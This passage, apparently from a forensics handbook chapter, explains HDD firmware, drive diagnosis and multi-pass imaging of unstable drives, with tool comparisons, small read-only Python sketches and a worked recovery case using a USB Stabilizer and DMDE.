The Guardonix is a quite powerful writeblocker which allows you to handle unstable drives by maintaining two independent connections - one to the PC, which is maintained even when the drive is hanging or unresponsive, and one to the drive itself. This way the operating system is not aware of any issues the drive may have. With the professional edition of the tool, the operator may even set a timeout to skip bad areas on the first pass.
The RapidSpar is a highly automated solution for easier data recovery cases. It allows only a basic level of control, but it can handle even some firmware cases automatically. The tool is mainly designed for PC repair shops to offer semi-professional data recovery services, but with the data acquisition addon it becomes quite an interesting tool for a forensics lab. It's just a pity the tool lacks even the most basic forensic functions!
It's good to have those firmware capabilities, but the RapidSpar does not document anything it does, so it's absolutely a no-go for forensics. For entry-level data recovery operations this tool is a good choice, but you may reach its limits quite fast because the tool supports basically no manual control.
The DeepSpar Disk Imager, DDI for short, is a PCIe card which can handle the cloning of highly unstable drives. It is the most professional data recovery tool of the three, but it is strictly limited to imaging. It is also ready for forensic imaging, as it can calculate checksums on the fly. The DDI is also known in the data recovery industry for its great handling of unstable drives.
The way the DDI reports errors is also great for diagnosis as the imaging progresses - errors are shown in the sector map as red letters. For example, an I means "sector ID not found", and if you only get read errors with the letter I after a certain LBA, the drive most probably has a translator issue (see the section on the firmware/error register).
The DeepSpar Disk Imager and RapidSpar have another advantage over the Guardonix/USB Stabilizer: these tools can build a headmap and ignore all sectors which belong to a defective head. This also allows you to identify bad heads and image the good heads first, which is safer.
How to approach a data recovery case
Before thinking about a data recovery attempt, you have to understand the cause of the issue and how to deal with it. This is very important because a wrong approach can damage drives.
That's why the first step is always the diagnosis! To properly diagnose an HDD, you need to understand the start-up procedure, the firmware and the sounds a drive makes with certain issues.
HDD start-up process
Put simply, you can divide the boot process of the HDD into the following steps:
1. The data from the ROM chip is loaded and the motor is started.
2. If the motor rotates fast enough for an air cushion to form, the read/write head is moved from the parking position (inside the spindle or outside the platters on a ramp) onto the platters.
3. The first part of the firmware, loaded from ROM, contains the instructions on how the disk can load the remaining part of the firmware from the platters. This is located in an area on the platters, the so-called service area, which is not accessible to the user.
4. If the firmware could be fully loaded, the disk reports that it is ready for use.
Knowing about this boot process can help us a lot in diagnosing problems. If a disk spins up, it most likely means that the ROM, MCU, RAM and motor control are OK, and PCB damage can be ruled out with a high degree of probability.
HDD firmware
A hard drive isn't just a dumb peripheral device; it's a small computer with a processor, memory, and firmware that's quite similar to an operating system. By now, only three manufacturers, who bought up many other competitors along the way, have prevailed in the market. Therefore, despite all the differences between the manufacturers, the firmware of hard drives follows a similar structure. The firmware is divided into different modules, which represent either data (G-List, P-List, S.M.A.R.T. data, …) or executable code.
In general, the individual modules can be divided into the following categories:
1. The servo subsystem, which can be compared to drivers on a PC. On the HDD, for example,
it’s responsible for controlling and operating the head and the motor. The Servo-Adaptive
Parameters (SAP) are there to correctly address these parts of the HDD. Damage in these
modules can also result in the motor not running or the head making clicking noises.
2. The read/write subsystem provides the addressing (CHS, LBA, PBA, …). This category includes
Zone-Table, G-List, P-List, …
3. The firmware core is responsible for ensuring that all modules and components work together
and can therefore best be compared to an operating system kernel.
4. The additional programs are very individual and depend on the model family and manufacturer,
just like user software on a PC. These include, for example, self-test and low-level formatting
programs.
5. The interface is responsible for communication via the SATA/PATA port and in some cases
also for communication via the serial port that some hard drives provide.
The higher layers build on the layers below. Therefore, the nature of a problem can already indicate at which level or levels you have to look.
A small part of the firmware is present on the ROM chip or directly in the MCU (Micro Controller
Unit). This part can be imagined as a mixture of BIOS and boot loader. It runs a self-test and then
uses the head of the drive to load the rest of the firmware from the platters.
We find the remaining parts of the firmware in the so-called service area (SA) on the platters. This
is a special area on the platters that is not accessible to a normal user. Usually, there are at least two
copies, which can then be read via head 0 and head 1.
To access the service area you need special software like WD Marvel and Sediv or special hardware
tools like PC-3000, MRT, DFL SRP or DFL URE (but URE is quite limited here).
These are not tools that can be learned by trial and error. Any incorrect use of the various options can damage the hard drive. If you try to repair a healthy module, there is a high chance that it will be damaged afterwards, and if it is a critical module, the HDD will not start anymore.
Also, the options offered vary depending on the vendor and model of the hard drive, so you can only perform certain actions on certain models. The learning curve of these tools is extremely steep, and a lot depends on the tool used. Mastering a firmware tool takes a lot of practice and experience, which you build up over years of working with other DR technicians, attending training courses and conferences, and working with support on specific cases.
So, this area of data recovery requires the greatest learning effort and the purchase of the most expensive tools, yet it represents only a very small part of the cases. Therefore, there are quite a few laboratories that only treat these firmware problems to a small extent themselves and outsource harder cases. MRT, for example, offers to have its technicians solve firmware problems via remote sessions and charges USD 50 in the case of a successful data recovery. DFL offers its customers up to 5 support requests per month for free, just like Ace Labs.
The possible causes of firmware problems are just as varied as the solutions:
• G-List or S.M.A.R.T. logs fill up or run into other modules (similar to a buffer overflow in
RAM) and partially overwrite them.
• The data of a module was written incompletely or is damaged due to other errors (e.g. failed
sector).
• The data in the ROM chip does not match the data in the service area.
• The ROM chip is mechanically damaged or short-circuited.
• etc.
If you think about the start-up process of the HDD, then from the perspective of the firmware, the
ROM chip is read first, then the servo subsystem, then the read/write subsystem and then everything
else is loaded to provide access to the user data.
If this process is not completed, it is not uncommon to have read and write access to the service area
but not to the user data.
Most of the commands that allow access to the firmware are manufacturer-specific and unfortunately not documented - at least not publicly!
There are some data recovery laboratories that have access to confidential company-internal documents of the manufacturers with the documentation of various firmware versions, manufacturer-specific ATA commands or the like, and sometimes they also pass them on to others on the sly.
In many areas, leaked information like that mentioned above, or reverse engineering, is the only source of information.
Some basic information can be found online as well as in firmware tool manuals. Anyone who
starts looking into this will have to invest some time here and read up accordingly whenever new
information is encountered.
Important parts of the firmware
As you already know, the service area is divided into modules, of which certain modules are essential for the operation of the disk and others are not.
If a disk cannot read data from copy 0, then it will usually try to read from copy 1. It can therefore
take a while before an HDD reports that it is ready. The firmware often makes several read attempts
before switching to the next copy. The more modules are damaged, the longer this can take. I’ve
seen hard drives which needed several minutes to become ready.
Some modules are unique to each disk and other modules are the same for all disks with a specific
firmware version, or even for all disks of an entire model range.
Damaged modules that are not individual for each hard disk can often be loaded from donor
disks or obtained from the Internet and then used to repair a customer disk. Within the firmware
sectors, there is another type of addressing - the so-called UBA addressing (Utility Block Address).
Sometimes it’s also called the Universal Block Address - that’s because manufacturers of data
recovery tools don’t have access to the firmware developer’s documentation and find out most of
it by reverse engineering and then just naming things themselves. That is why the individual terms
also differ between the individual firmware tools (PC-3000, MRT, DFL).
The following parts can be found in one form or another in every HDD's firmware, and it's very important to understand them in order to recover data from an HDD.
P-List
This list includes the sectors that were defective at production time. That's why it is called the primary, permanent or production-time defects list. So that the hard disk is not forced to execute head jumps right from the start due to remapped sectors, the sectors that were already defective at production time are skipped, and the LBA numbering is structured in such a way that it runs consecutively from sector 0 to N with the defects in between simply skipped:
12.1 - P-list
This also shows how PBA (physical block addressing) differs from LBA (logical block addressing). The P-List is one of those modules that are unique to each hard drive and cannot be replaced. A small sketch of this mapping follows below.
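To make the LBA-to-PBA relationship concrete, here is a minimal sketch under a deliberately simplified model in which the P-List is just a sorted list of physical sector numbers skipped at production time (real drives store this far more compactly, often per zone; the defect list below is made up):

```python
# Simplified model: the P-List is a sorted list of physical sectors skipped at
# production time. LBA numbering stays consecutive; the physical address just
# shifts past every factory defect that lies at or before it.
P_LIST = [17, 1024, 1025, 90000]  # hypothetical factory defects (PBAs)

def lba_to_pba(lba: int) -> int:
    pba = lba
    for defect in P_LIST:      # sorted ascending
        if defect <= pba:
            pba += 1           # defect sits at or before us - shift one further
        else:
            break
    return pba

print(lba_to_pba(16))    # 16   - no defect reached yet
print(lba_to_pba(17))    # 18   - the defect at PBA 17 is skipped
print(lba_to_pba(1023))  # 1026 - three defects skipped by this point
```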
G-List
The growing defects list, or G-List, is a list of sectors that fail during operation. To avoid having to move several TB of data by one sector in the worst case, a defective sector is replaced with the next free reserve sector during operation:
12.2 - G-list
If a read or write error occurs, the sector is marked as defective and mapped out at the next opportunity when the disk is idle. This happens in so-called background processes, which in most cases start after 20 seconds of idle time.
That's why professional data recovery labs disable unnecessary background activities in order not to corrupt data and to save the disk unnecessary work. If you do not have that option, you need to pay attention to the drive and not let it run when it is not in use.
If the G-List is lost, data will be damaged because sectors mapped out during operation are reset to their old locations. However, this can also be used in a forensic investigation to recover old data fragments in the sectors which got mapped out, even after the disk has been wiped.
This also means that a hard disk becomes slower and slower the more mapped-out sectors there are, because the head has to jump to the new location of an LBA more often when reading the data.
Depending on the manufacturer and model series, this differs slightly. Many disks have smaller reserve areas distributed over the platters to minimize any necessary jumps and the associated loss of performance.
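Conceptually, the G-List is a remap table consulted on top of the normal LBA-to-PBA translation. A minimal sketch, again under a deliberately simplified model with made-up sector numbers:

```python
# Simplified model: the G-List maps an LBA that failed during operation to a
# spare physical sector. If this table is lost, reads fall back to the old,
# possibly stale sectors - the forensic angle mentioned above.
G_LIST = {5000: 7_800_000, 5001: 7_800_001}  # hypothetical grown defects

def resolve(lba: int) -> int:
    # Remapped during operation? Then the data lives in the reserve area.
    # Otherwise the normal (P-List based) translation applies; the identity
    # mapping stands in for it here.
    return G_LIST.get(lba, lba)

print(resolve(4999))  # 4999    - regular mapping
print(resolve(5000))  # 7800000 - reserve sector, far away on the platters
```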
Translator
The translator is the module that converts the LBA address into the corresponding arm movement.
If the translator is defective, you have no access to the data. It is relatively easy to test whether the
translator has a problem.
Zone tables
Zones make it possible to use a different number of sectors per track.
The old CHS (Cylinder, Head, Sectors) addressing assumed that each track or cylinder had the same
number of sectors. Since the radius of the cylinders decreases with each step in the direction of the
spindle, a lot of space would be wasted if the outer cylinders had the same number of sectors as the
inner cylinders.
Here is a simplified graphic representation for comparison:
12.2 - HDD with and without zone tables
What is graphically displayed here is saved by the zone table in a form that can be used by the firmware. Without this data, it would not be possible to calculate where a specific LBA address is located on the platters!
Servo parameters/Servo adaptive parameters
This data is used to fine-tune the head and is unique to each hard drive. Incorrect data can lead to
the head no longer reading or only reading with reduced performance.
There are often different data sets for the service area and the user area.
Security-relevant data/passwords
Some encryption methods save the passwords on the hard disk in the service area. In these cases,
passwords can be easily read out or removed with access to the firmware modules.
Firmware/overlay code
To put it simply, these are program instructions that are loaded into the main memory of the HDD
when required.
As with very old computers, the working memory of hard disks is very limited and therefore
developers have to be careful with it.
Depending on the context in which these terms are used, it is code that is loaded when required, like
a DLL, or code that is loaded from the service area and overwrites the first rudimentary program
parts loaded from the ROM.
In any case, the term is more common for special code parts that are loaded into the RAM of the
HDD when needed and then replaced with other code parts in the RAM when the function is no
longer needed.
S.M.A.R.T. data
S.M.A.R.T. was developed to warn the user before a hard drive fails. Often, however, S.M.A.R.T. is the cause of such a failure.
The S.M.A.R.T. log can become corrupted and contain invalid data that the disk cannot process, causing the disk to fail to boot fully and never report that it is ready.
Since S.M.A.R.T. is not essential for operation, deleting the S.M.A.R.T. data and disabling the
S.M.A.R.T. functions is the simplest solution to this problem.
Serial number, model number and capacity
In many cases, the serial and model numbers are read from the service area. If a hard drive shows
the correct model and serial number, as well as capacity and firmware version, this is a very strong
indicator that the head can at least read the service area.
If there is no access to the user data, but the above-mentioned values are displayed correctly (data
recovery technicians call that a “full ID”), you can determine with a high degree of certainty that at
least one head is OK and can read.
Safe mode
Hard drives have a safe mode that they go into if some part of the firmware is corrupt. This manifests itself in multiple clicks, the motor shutting down and restarting, and then another attempt. Smaller 2.5" laptop drives often just shut down and don't try multiple times.
PC-3000 recognizes this problem itself and shows us that a hard disk is in safe mode.
You can also put the hard drive into safe mode on purpose. The hard disk then waits for suitable firmware to be uploaded to its RAM. This is also referred to as a "loader".
Once the loader has been successfully uploaded and is running, you can start repairing corrupted firmware modules.
Status and error registers
Besides the noise and behaviour of a drive, there is status information which can be displayed by some data recovery tools like the DDI, MRT, PC-3000 and DFL. There are also some free tools which show these status flags, such as Victoria²⁷³ or Rapid Disk Tester²⁷⁴.
12.3 - status flags from MRT
These status flags, displayed like indicator LEDs in the tools, also help with diagnostics.
BSY means "busy" and indicates that the disk is working. It's OK to leave an HDD or SSD on BSY for a while and wait, as long as the disk isn't making any weird noises! BSY is the first status that the HDD shows before the firmware is fully loaded. While waiting, I monitor an SSD with a thermal camera and an HDD with a stethoscope.
DRD stands for “drive ready” and means that the hard disk is ready to receive commands.
DSC means “drive seek complete” and indicates that the head has moved to a specific position.
DWF means “drive write fault” and should always be off.
DRQ means “data request” and is set when the data carrier is ready to transfer data.
CRR stands for “corrected data” and should always be off.
IDX means “index” and should always be off.
ERR stands for “error” and indicates if an error occurred with the previous command. The error is
then described in more detail by the following error codes:
• BBK (bad block)
• UNC (uncorrectable data error)
• INF (ID not found)
• ABR (aborted command)
• T0N (Track 0 not found)
• AMN (Address marker not found)
The abbreviations can differ from tool to tool.
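These flags correspond to bits of the ATA status and error registers, so decoding them is a simple bit test. Here is a small sketch of how a tool might do it, with bit positions following the ATA specification and arbitrary sample values:

```python
# Decode ATA status and error register bytes into the flag names used above.
# Bit positions follow the ATA specification; the sample values are arbitrary.
STATUS_BITS = {0x80: "BSY", 0x40: "DRD", 0x20: "DWF", 0x10: "DSC",
               0x08: "DRQ", 0x04: "CRR", 0x02: "IDX", 0x01: "ERR"}
ERROR_BITS = {0x80: "BBK", 0x40: "UNC", 0x10: "INF",
              0x04: "ABR", 0x02: "T0N", 0x01: "AMN"}

def decode(register: int, table: dict) -> list:
    return [name for bit, name in table.items() if register & bit]

status = 0x51  # DRD + DSC + ERR: ready, seek complete, but an error occurred
error = 0x40   # UNC: uncorrectable data error - a classic bad sector
print(decode(status, STATUS_BITS), decode(error, ERROR_BITS))
# ['DRD', 'DSC', 'ERR'] ['UNC']
```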
Diagnosing the issue
Up to now you have learned how to get a better picture of the inner processes of an HDD, so it's time to use that knowledge practically…
²⁷³https://hdd.by/victoria/
²⁷⁴https://www.deepspar.com/training-downloads.html
It would be hard to describe some of the sounds you may hear when a drive has a certain issue - luckily, a data recovery lab has recorded a lot of sound samples and offers them on their homepage. You can find the files here²⁷⁵.
If a disk spins up but then gets stuck in the BSY state, this indicates that parts of the firmware are corrupt or unreadable, or that background processes are running on the hard disk which hang or take a long time to finish. It can also be due to issues reading the firmware from the platters. If the drive sounds OK, wait a few minutes and see whether it comes ready. If a drive is not ready within 10-15 minutes, it's highly unlikely it will become ready if you wait longer. Most likely you will need a firmware tool and the proper knowledge to deal with that issue.
If a disk reports readiness but shows unusual values - e.g. 0 GB or 3.86 GB for the capacity - then an essential part of the firmware may be corrupted, or only the part from the ROM chip could be read. It's also possible that the ROM chip is wrong (e.g. an amateur attempted a data recovery and just swapped the PCB), that the head is damaged and can't read the data from the service area, or that an early-loaded firmware module is corrupted.
If the head keeps clicking, it can sometimes indicate a firmware problem or the wrong ROM chip on the PCB. Much more likely, though, the head is defective and cannot find the service area because it can no longer read anything. I've also seen these symptoms when the ROM chip was defective.
The more experience you gain, the better you will be at assigning noises, status LEDs and other
indications from the hard drive to a specific problem. You don’t learn data recovery overnight!
Before cloning the drive, try to read the first sector; if that works, read the last sector and at least one sector in the middle of the disk. If you can read the drive up to a specific LBA and the sectors after this LBA are unreadable, it could be either a defective head or the translator (sometimes also called the address decoder).
With a defective head you can read up to some point, then you get a group of unreadable sectors, and after the sectors belonging to the defective head you can read some data again. If the translator is damaged, you can't read a single sector after a certain LBA.
To test which issue you are facing, you can try to read more sectors (maybe 10 or 15) distributed across the entire surface; a small sketch of such a probe follows below.
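As a rough illustration of that probing step, here is a minimal sketch assuming a Linux host, root privileges and a hypothetical device path - with a hardware writeblocker between host and drive still strongly advised:

```python
# Probe a handful of sectors distributed across the drive surface.
# Assumes Linux, root privileges and a writeblocked drive at DEVICE.
import os

DEVICE = "/dev/sdb"  # hypothetical evidence drive
SECTOR = 512         # logical sector size
PROBES = 15          # number of evenly distributed test reads

fd = os.open(DEVICE, os.O_RDONLY)
try:
    total_sectors = os.lseek(fd, 0, os.SEEK_END) // SECTOR
    for i in range(PROBES):
        lba = i * (total_sectors - 1) // (PROBES - 1)
        try:
            os.pread(fd, SECTOR, lba * SECTOR)
            print(f"LBA {lba:>12}: OK")
        except OSError as exc:
            print(f"LBA {lba:>12}: read error ({exc.strerror})")
finally:
    os.close(fd)
```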
Another good indication is the S.M.A.R.T. values. The mere fact that you can read the S.M.A.R.T. values means that the heads are good and able to read at least the service area, and it also means that the firmware is loaded at least up to the S.M.A.R.T. module - which means basically all the critical modules are loaded.
The values themselves tell you more important information:
• 0x05 (Reallocated Sectors Count) tells you how many bad sectors got reallocated.
• 0x0A (Spin Retry Count) tells you how often the drive tried to spin up multiple times until it reached the desired RPM. This can indicate a mechanical problem.
²⁷⁵https://datacent.com/failing_hard_drive_sounds
• 0xBB (Reported Uncorrectable Errors) tells you how many errors could not be corrected by ECC. This can indicate fading of the magnetisation on the platters when the drive was not in use for a long time, or degradation of the head or the magnetic coating.
• 0xBC (Command Timeout) tells you how often a timeout occurred while trying to execute a command. This can sometimes indicate problems with the electronics or oxidized data connections.
• 0xC4 (Reallocation Event Count) tells you how many sector reallocations were attempted, successfully and unsuccessfully.
• 0xC5 (Current Pending Sector Count) tells you how many sectors are waiting for reallocation. This value is very important for forensics! If the drive is idle for longer than 20 seconds, these sectors can get reallocated, which could alter data.
• 0xC6 (Uncorrectable Sector Count) tells you how many sectors were not corrected by ECC. The same as for 0xBB applies here.
• 0xC9 (Soft Read Error Rate) tells you how many uncorrectable software read errors occurred. The same as for 0xBB applies here.
In combination with 0x09 (Power-On Hours Count) you can conclude whether the errors indicate a production issue and therefore a likely rapid degradation of the drive (a small number of hours), or the normal degradation over time if the drive was in use for many hours.
The forensic importance of S.M.A.R.T. data
I recommend capturing the S.M.A.R.T. values before and after imaging. As you have learned by now, the drive will reallocate bad sectors when it stays idle for too long. This can cause big issues when someone else calculates the checksum of the drive and it does not match the checksum in your report.
Even if you take care that the drive is never idle, some other investigator may let the drive idle for a few minutes before calculating the checksum and thus alter the data. In such cases it's wise to have the S.M.A.R.T. values recorded before and after imaging so that you can explain why the checksums no longer match.
In a data recovery case, some drives may have trouble booting up due to a minor scratch in the service area which is very hard on the head when starting. So, you would not want to start the drive multiple times, as you cannot know whether the head or drive will survive the next start. If you are not able to deactivate background processes like the reallocation of sectors, it is in some cases necessary to accept the smaller risk and rather lose a few sectors than the whole drive. Of course, the best way would be to outsource such a case to a professional data recovery lab, but this is not always an option.
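One simple way to follow the recommendation above is to snapshot the attribute table with smartmontools before and after imaging. A minimal sketch, assuming a Linux host with smartctl installed and a hypothetical device path:

```python
# Snapshot S.M.A.R.T. data before and after imaging with smartmontools.
# Assumes Linux, root privileges and smartctl on the PATH; /dev/sdb is hypothetical.
import subprocess
from datetime import datetime, timezone

def snapshot_smart(device: str, label: str) -> str:
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    report = subprocess.run(["smartctl", "-x", device],
                            capture_output=True, text=True).stdout
    filename = f"smart_{label}_{stamp}.txt"
    with open(filename, "w") as fh:
        fh.write(report)  # timestamped copy for the case file
    return filename

snapshot_smart("/dev/sdb", "before_imaging")
# ... imaging happens here ...
snapshot_smart("/dev/sdb", "after_imaging")
```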
Imaging of unstable HDDs
The imaging of unstable HDDs follows a simple approach - first you want to get the low-hanging fruit with a low stress level for the drive, and then you fill the gaps and read the problematic areas.
In more technical terms, you need multiple imaging passes. In the first pass you use a short read timeout (300-600 ms) so that the head does not work too long on bad sectors. The reading process will then look like this:
12.4 - Simplified graphical representation of the read process
If the data is delivered by the drive before the read timeout occurs, you save the data and continue reading the next block. If the timeout is reached, the imaging device sends a reset command to cancel the internal read retries of the drive, and the imaging continues with the next block.
That is why the read timeout is the most important setting for handling unstable drives! The longer a head spends trying to read bad sectors, the more damage it can accumulate over time.
Some drives have bigger areas of bad sectors - in such cases it is wise to skip a certain number of sectors to get past the bad areas faster. If you don't know whether the drive has experienced a drop or a head crash, you can't be sure there is no minor scratch on the surface. That's why, in my first imaging passes, I always set a high number of sectors to skip after a read error (e.g. 256,000). This ensures that you skip over bad areas or tiny scratches very fast.
Once you have read all the good sectors with a short read timeout, you can run the next imaging pass with a longer timeout and re-read all blocks which were skipped in the previous pass.
If a pass yields mainly skipped blocks and only the occasional read block, you have to increase the timeout until you read at least two thirds of the blocks.
As you increase the read timeout with each pass, you should decrease the number of sectors skipped after a read timeout or read error. A sketch of this multi-pass logic follows below.
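The multi-pass strategy just described can be summarised in a few lines of Python. This is only a sketch: read_block() is a stand-in for whatever the imaging hardware actually exposes, and the pass settings mirror the timeouts and skip sizes discussed above:

```python
# Multi-pass imaging sketch: short timeout and big skips first, then longer
# timeouts and smaller skips on the remaining gaps. read_block() is a
# placeholder for the real imaging hardware.
import random

SECTORS = 1_000_000
BLOCK = 256                                        # sectors per read request
PASSES = [(0.5, 25_600), (3.0, 2_560), (10.0, 1)]  # (timeout in s, skip size)

def read_block(lba: int, timeout: float) -> bool:
    """Placeholder: pretend weak areas only succeed with longer timeouts."""
    return random.random() < 0.7 + 0.03 * timeout

sector_map = {}                           # block start LBA -> "ok" | "bad"
pending = list(range(0, SECTORS, BLOCK))  # blocks still to be imaged

for timeout, skip in PASSES:
    retry = []
    while pending:
        lba = pending.pop(0)
        if read_block(lba, timeout):
            sector_map[lba] = "ok"
            continue
        sector_map[lba] = "bad"
        # Jump past the suspected bad area; the skipped blocks and the failed
        # one are queued for the next, more patient pass.
        retry.extend([b for b in pending if b <= lba + skip] + [lba])
        pending = [b for b in pending if b > lba + skip]
    pending = sorted(set(retry))

print(sum(v == "ok" for v in sector_map.values()), "of", SECTORS // BLOCK, "blocks read")
```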
If your tool allows you to create a headmap, I would strongly suggest doing that before imaging. That way, you can see whether there is a bad head or even a completely broken head, so you can skip the sectors of that head in the first pass.
If a drive does not identify but gets stuck in BSY, it may be one of the commands used to initialize the drive that causes it to hang. That's why the DDI allows you to configure the commands used to initialize the drive. Sometimes a non-standard initialization procedure will allow a drive to become ready:
12.5 - DDI configuration of drive initialisation command sequence
If you change the identification procedure and the drive becomes ready but you cannot image a single sector, you have to try another identification procedure so that the drive does not just become ready but also gives you data access!
Some imagers allow us to deactivate unnecessary functions of the drive like S.M.A.R.T., caching, sector reallocation, etc.
Deactivating unnecessary features makes the imaging not just a bit faster but also much lighter on the drive. If S.M.A.R.T. is enabled, the drive will have to update the S.M.A.R.T. data each time it hits a bad sector. This forces the head to jump to the service area and write data, and that is not just more "stress" for the drive but also a risk. If the drive writes bad data into a firmware module, it can develop a firmware issue and not boot anymore. Alternatively, the module can grow too big and damage the following module in the service area, resulting in the same problem.
The DDI has an option in the menu to deactivate such things (Source -> Drive Preconfiguration). This option deactivates things based on a preset from DDI, but it doesn't allow you to select specific items. A fully fledged firmware tool like MRT will allow you to do that:
12.6 - MRT edit HDD ID dialogue
The next possible setting is the read mode. You can use the faster UDMA modes or the older and slower PIO mode if your hardware imager allows you to set these things, as the DDI, MRT, DFL and PC-3000 do:
12.7 - MRT read mode selection for an imaging task
12.8 - DFL DE read mode selection for an imaging task
The other modes, like Read, ignore CRC, are helpful in some cases - and here the DDI does a fabulous job. MRT does exactly what the name suggests and reads the data and writes it to the image or target drive no matter whether the checksum of the sector matches. The DDI in this mode reads the sector multiple times and does a statistical analysis for each bit to get the most probable result instead of the first result the drive delivers. Each approach is useful when the sector checksum is corrupted. If a very weak head gives you bad data, the statistical analysis of DeepSpar's DDI ensures that you get the best possible result, but the trade-off is a longer imaging duration and much more stress on the head. That's why this is not an option you should use on the first pass, but rather on the last imaging pass!
The idea behind using a slower read mode is simple: an unstable drive may read more reliably at a slower speed. There are also cases where a firmware part is damaged and the drive is highly unstable in UDMA, for example, while PIO would use another, fully functional part of the firmware. Different read commands also apply different procedures and, in some cases, you may be able to read bad sectors with another read mode. That's why I recommend using different read modes in different passes.
The same applies to the read method (LBA, CHS, …)!
The last option I want to mention is the imaging direction - forward or backward. In backward imaging the drive bypasses the cache, and that's how you can overcome issues with the cache. It also makes the imaging process much slower, but slow imaging of good data is much better than fast imaging of data corrupted by the cache!
You can also see that different tools offer different levels of control and different options. If I needed to use the ignore CRC option, I would certainly use the DDI, not MRT - and DFL would not even give me that option at all. For read-mode control, on the other hand, DFL gives me more granular options.
That's also why a full-blown data recovery operation needs a lot of different tools, so that the tool which fits best can be selected for each job.
There are even more options to optimise the imaging. One of them is the reset command: you may choose between a hardware and a software reset. Some drives process one of these resets much better or faster than the other. I have even seen drives freeze when the "wrong" reset command was issued.
Practical example – imaging a WD40NMZW with the Guardonix
writeblocker
This is a drive I recently recovered. The drive is highly unstable and has a lot of bad sectors and a very weak head, because the local PC repair shop tried to recover the data by scanning the drive with a data recovery program, which took multiple days because of internal read retries. In the end, the head was so damaged that Windows started to hang when the drive was directly connected, and after a while Windows just dropped the HDD.
This is also a good example of the damage a wrong data recovery approach can cause. At least the head is not totally dead - so you have something to work with.
I thought about this example for a while, and I think the most useful tool for a forensics lab would be the USB Stabilizer. This tool is the "bigger brother" of the Guardonix writeblocker, and it allows you a bit more control. It can also be used with firmware tools, so if you are thinking about data recovery, this would be my recommendation for the lowest you should go.
When not used for data recovery, the USB Stabilizer works as a USB writeblocker, and as you may know, basically every storage device can be adapted to USB. So, if you are starting out in forensics, this is the tool which gives you the most options.
That makes this quite an extreme example - you have the lowest-end tool and a data recovery case which is at least a medium- to higher-difficulty imaging job. So this will also be a good test of what the USB Stabilizer can do!
This case also gives me the opportunity to demonstrate another procedure in data recovery: a USB-to-SATA conversion for Western Digital drives. This is basically the same procedure as a PCB swap; you just swap a USB PCB for a SATA PCB.
Before I explain how that’s done, I want to show you what data is stored in the ROM-chip on the
PCB:
12.9 - List of firmware modules on a Western Digital ROM chip
As you can see in the image, the modules 0x30 and 0x47 contain the service-area (SA) translator and the SA adaptive parameters. These two modules make each ROM chip unique to its drive. That's why you have to transfer the ROM chip from the original PCB to the new PCB.
That is not just valid for WD drives but for every manufacturer!
To check which chip is the ROM chip, I usually search Google Images for the PCB number (2060-######-### Rev X in the case of WD PCBs) plus the word donor. This usually brings up images from specialized retailers of donor drives and PCBs. Some of them have marked the ROM chips in their images.
I also validate this by searching Google for the datasheet of the marked component. If it is indeed an SPI flash chip or something like that, you have confirmed that this component is the ROM chip.
There are some PCBs with an empty space for the ROM chip. This means the data is in the MCU (microcontroller unit) and the ROM chip is used in later revisions to patch the MCU with newer code.
In those cases you have to transplant the MCU from the original PCB without a ROM chip and remove the ROM chip from the donor PCB if there is one. Usually, there is also another component on the PCB which acts as a switch to activate the ROM chip. This has to be removed as well.
If the original PCB has a ROM chip but the donor PCB doesn't, you have to transfer the ROM chip and the second component used as a switch.
12.10 - ROM-chip transfer for PCB-swap
This is often needed for imaging, as a USB interface is not as stable as SATA, but it is also used in case a PCB is damaged.
Now I am using an Axagon Fastport2 adapter to connect the HDD to my USB Stabilizer. So, I am basically reverting the SATA conversion I had done to image the drive with MRT.
The first step is to get the drive to ID. To see whether the drive is recognised, I open the Log tab and activate the power supply in the USB Stabilizer application:
12.11 - USB Stabilizer Log-tab
If you have a 3.5" drive, you can use a USB dock. In that case you have to activate power in the USB Stabilizer first and then power on the dock.
Then you have to select the drive in DMDE:
12.12 - DMDE drive selection and USB Stabilizer Settings-tab
I have chosen DMDE²⁷⁶ because the tool is pretty cheap, powerful and also great for analysing filesystems. That makes the program a good choice for data recovery and even quite useful for forensics.
The Settings tab of the USB Stabilizer application has controls for the device type (HDD or SSD), which affects the handling of resets, for the reset type (software, hardware, controller, …) and finally for the read timeout.
So you have the most important settings for the imaging speed and the stress level of the drive, as well as for resets, which can cause instability issues. That means you have the most basic controls. The checkbox Turn Off Drive if Inactive is also helpful to prevent the reallocation of bad sectors from damaging data and the drive before you start another imaging pass. But that only works with 2.5" drives, as they can be powered directly over USB and thus the USB Stabilizer can power them off.
With the Commands button you can issue resets manually or log the S.M.A.R.T. data, as I suggest doing before and after forensic data acquisition.
To sum up so far: you are using the lowest-end data recovery tool with a cheap data recovery program on a case of medium to higher difficulty even for professional data recovery tools - a case which took a five times more expensive and much more flexible tool over a week to image.
After you select the disk, you see the following initial scan dialog:
²⁷⁶https://dmde.com
12.13 - DMDE initial scan
DMDE tries to read the first sectors, and this drive has a bad LBA 0 (MBR) which can't be read. DMDE sees that because I have set the USB Stabilizer to report read errors back to the OS so that the software can log them correctly.
This is why DMDE displays the following error:
12.14 - DMDE read error
You can select "Ignore all" and cancel further processing of the partition table. First you want to clone the drive, and then you run the logical data recovery on the image file.
DMDE allows you to control a few other parameters while imaging. First, you need to set the LBA range and the target:
12.15 - DMDE imaging settings - Source and destination
This dialog should be pretty self-explanatory. DMDE only allows you to create a raw image. More advanced tools will allow you to create VHD, VHDX or some other kind of sparse files, which will save you a lot of space on the target drive.
The next settings need to be made in the Parameters tab:
12.16 - DMDE imaging settings - Parameters and Source I/O Parameters
First, you should create a log file. This file stores an overview of read, unreadable and skipped sectors. You can also choose to image in reverse in this dialog. I unchecked Lock the source drive for copy as the USB Stabilizer acts as a writeblocker anyway.
For the second pass you can also select here to retry bad sectors. This makes sense because many of the bad sectors can be retrieved with a longer read timeout.
A click on the Parameters button opens the second window. In the Ignore I/O Errors tab you can select which fill pattern should be used for bad and skipped sectors and how many sectors will be skipped after a bad sector. This setting allows you to get past bad areas quicker.
From my experience with this drive, I chose 25,600 for the first pass. In MRT I had used 256,000 on the first try, but I realized that I was skipping too many sectors and that there were bad areas all over the surface. So I was pretty certain that I was not dealing with a local issue like a minor scratch. That's why, after the 15% or 20% mark, I lowered the skipped sectors in MRT to 25,600 as well.
I still kept it quite big for the first pass, as I had realized with a much smaller setting that the bad areas are 20,000-80,000 sectors wide - so 25,600 was a good size to skip them in 1 to 4 steps. As I said: get the low-hanging fruit first, because you never know whether the drive will die on you in the first pass!
DMDE shows you the total number of read and skipped LBAs:
12.17 - DMDE imaging progress
The Action button lets you cancel the imaging or change the I/O settings while you are imaging. That lets you fine-tune the skip settings on the fly.
